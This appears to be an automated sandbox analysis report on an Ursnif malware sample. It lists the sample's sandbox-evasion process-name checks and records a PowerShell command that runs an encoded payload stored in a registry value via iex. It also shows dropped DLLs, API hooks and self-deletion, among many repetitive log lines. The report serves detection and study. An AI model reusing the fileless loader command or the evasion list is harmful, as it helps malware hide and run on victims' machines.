Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
                    Suspicious powershell command line foundShow sources
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E57AB0 push ecx; ret 21_2_00E57AB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E57E1F push ecx; ret 21_2_00E57E2F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055876C0 push ss; ret 21_2_055876C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05594EE0 push ecx; ret 21_2_05594EE9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0559528F push ecx; ret 21_2_0559529F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3DC6E9 push 3B000001h; retf 31_2_000002174F3DC6EE
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000BC6E9 push 3B000001h; retf 38_2_000BC6EE
                    Source: C:\Windows\System32\rundll32.exeCode function: 40_2_00000195D8ABC6E9 push 3B000001h; retf 40_2_00000195D8ABC6EE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05585529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,21_2_05585529
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'Jump to behavior

                    Persistence and Installation Behavior:

                    barindex
                    Creates processes via WMIShow sources
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fum.cppJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.dllJump to dropped file
                    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fum.cppJump to dropped file

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
                    Source: Yara matchFile source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY
                    Hooks registry keys query functions (used to hide registry keys)Show sources
                    Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                    Deletes itself after installationShow sources
                    Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\345678.vbsJump to behavior
                    Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
                    Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
                    Modifies the prolog of user mode functions (user mode inline hooks)Show sources
                    Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                    Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
                    Source: explorer.exeEAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeKey value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDateJump to behavior
                    Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
                    Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
